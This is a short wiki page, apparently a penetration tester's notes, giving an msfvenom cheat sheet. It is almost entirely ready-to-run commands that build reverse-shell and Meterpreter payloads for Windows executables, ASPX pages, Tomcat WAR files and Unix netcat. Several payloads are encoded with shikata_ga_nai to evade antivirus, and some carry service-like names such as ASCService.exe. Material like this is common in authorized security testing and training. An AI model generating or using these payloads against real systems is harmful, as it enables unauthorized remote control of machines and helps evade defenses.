Skip to content

MSFVenom

Alvin Smith edited this page Jul 31, 2021 · 19 revisions

Cheat Sheet

https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/

Or better

https://www.revshells.com/

Samples

  • msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe -o ASCService.exe
  • msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
  • msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
  • i.e. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.4.3.98 LPORT=4443 -f exe -o reverseTCP.exe

aspx

msfvenom -p windows/x64/shell_reverse_tcp LHOST="ip" LPORT=4242 -f aspx > shell.aspx

Tomcat WAR

msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o pwn.war

Output as Raw

msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R

List payloads

msfvenom --list payloads msfvenom -l | grep windows

Others

Shikata Ga Nai

https://security.stackexchange.com/questions/130256/what-is-shikata-ga-nai

Clone this wiki locally